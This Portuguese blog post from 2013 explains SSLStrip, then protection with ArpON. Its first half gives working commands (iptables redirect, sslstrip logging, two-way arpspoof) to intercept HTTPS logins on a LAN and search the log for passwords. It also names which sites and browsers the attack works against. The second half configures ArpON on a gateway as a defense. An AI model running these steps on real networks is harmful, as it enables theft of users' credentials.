quarta-feira, 22 de maio de 2013


Introdução

Veremos um pouco sobre o 
SSLStrip
, descobriremos que o uso da conexão segura 
SSL
 não garante a proteção do usuário 100%. Muita gente acha que ao usar HTTPS, está livre de qualquer ataque de crackers, mas na verdade não é bem assim, existem métodos que possibilitam o roubo de informações mesmo em sites seguros. 
O SSLStrip nos permite isso, esta técnica é relativamente fácil de aplicar e extremamente poderosa. Ela funciona juntamente com o arpspoof, que já vimos como funciona, para aqueles que não viram, segue o link:

Quando um usuário conecta-se em um site seguro, ele transfere as informações criptografadas com o servidor impedindo um ataque de 
sniffing
 tradicional. Quando realizamos o ataque de SSLStrip, primeiramente interceptamos o tráfego do alvo através de técnicas 
man-in-the-middle
, assim, o atacante engana o alvo fazendo-se passar por um proxy e engana o servidor se passando pelo cliente, assim as informações são passadas para o atacante em texto puro. 
Abaixo demonstrarei como funciona o ataque propriamente dito, utilizei um BackTrack 5 R2para usar o SSLStrip e um Windows como alvo. 
* Todas as informações aqui contidas são para fins didáticos e não para causar danos e prejuízos para alguém, usem este conhecimento com ética e responsabilidade. 

Procedimentos

Primeiramente habilitaremos o encaminhamento de pacotes para realizar o 
ARP spoofing
# echo "1" > /proc/sys/net/ipv4/ip_forward 
Agora, vá até o diretório do SSLStrip no BackTrack: 
# cd /pentest/web/sslstrip 
Redirecione o tráfego da porta 80 para a porta que utilizaremos no SSLStrip, no caso, redirecionei para a porta 8080: 
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 
Agora vamos mandar o SSLStrip escutar o tráfego na porta 8080 e mandar ele logar tudo: 
# python sslstrp.py -a -l 8080 
Depois disso, em outro terminal, comece o ARP spoofing entre a vítima e o gateway
# arpspoof -i eth0 -t 192.168.0.55 192.168.0.1 
Em outro terminal: 
# arpspoof -i eth0 -t 192.168.0.1 192.168.0.55 
Você pode acompanhar o tráfego dando: 
# tail -f sslstrip.log 
Para ver as senhas, procure por login ou passwd dentro do arquivo de log, não se assuste com a quantidade de informações dentro do arquivo, é assim mesmo. 
Obs.: Se você estiver tentando capturar senhas do Gmail e a vítima estiver utilizando o Google Chrome não vai funcionar, tem que ser outro navegador, como o IE por exemplo. Mas o resto funciona, como: Facebook, Terra, entre outros. 

Como se proteger

O ArpON é uma ferramenta open source que faz ARP seguro, evitando, com isso, ataques como 
Man-in-the-middle
DHCP Spoofing
DNS Spoofing
Web Spoofing
Sequestro de sessão SSL
, entre outros. Ela funciona monitorando a tabela ARP da rede, gera e bloqueia alterações na tabela. 
Bem, como na maioria das empresas a maioria dos hosts são Windows, iremos basear o laboratório no seguinte cenário:
                 
     FIREWALL  / GATEWAY
                    |
                  SWITCH
                    |
        ---------------------------
        |           |             |
       HOST        HOST          HOST

Não sei se dá para entender (hehehe), mas vamos amos explicar mais um. pouco. É no nosso servidor 
GNU/Linux
 que compartilha a Internet para a rede interna que será instalado o 
ArpON
, e nele, iremos colocar todos os IPs e MACs dos nossos clientes. 
Assim, quando algum usuário malicioso tentar fazer o ARP spoofing, ele não irá conseguir completar. Do alvo para o gateway, ele vai conseguir, pois não temos nenhuma proteção no cliente. Mas quando ele tentar fazer do gateway para o alvo, ele não vai conseguir, pois o ArpON que está no gateway irá bloquear, com isso, impedimos o ataque e conseguimos até ver qual é o usuário espertinho. 
Bem, vamos colocar a mão na massa. Para instalar o ArpON: 
# aptitude install arpon 
Agora, edite o arquivo de configuração do ArpON: 
# pico /etc/default/arpon 
Descomente a linha: 
DAEMON_OPTS="-d -f /var/log/arpon/arpon.log -g -i eth1 -s"
Obs.: Repare que existe um parâmetro nessa linha (
-i eth1
) que não haverá no arquivo de vocês, é porque no meu laboratório a interface da rede interna é 
eth1
, caso a de vocês seja 
eth0
, não é necessário colocar este parâmetro. 
E mude a linha: 
RUN="no"

Para: 
RUN="yes"
Agora precisamos cadastrar os IPs e MACs dos clientes: 
# pico /etc/arpon.sarpi 
Edite o arquivo da seguinte forma: 
#IP              MAC
192.168.0.5          f5:f5:f5:f5:f5:f5
Obs.: Faça a identação com tabulações. 
Agora é só iniciar o ArpON: 
# /etc/init.d/arpon start 
E acompanhar os logs: 
# tail -f /var/log/arpon/arpon.log 
 Creditos:rik_99(VOL)

0 comentários:

Postar um comentário

Subscribe to RSS Feed Follow me on Twitter!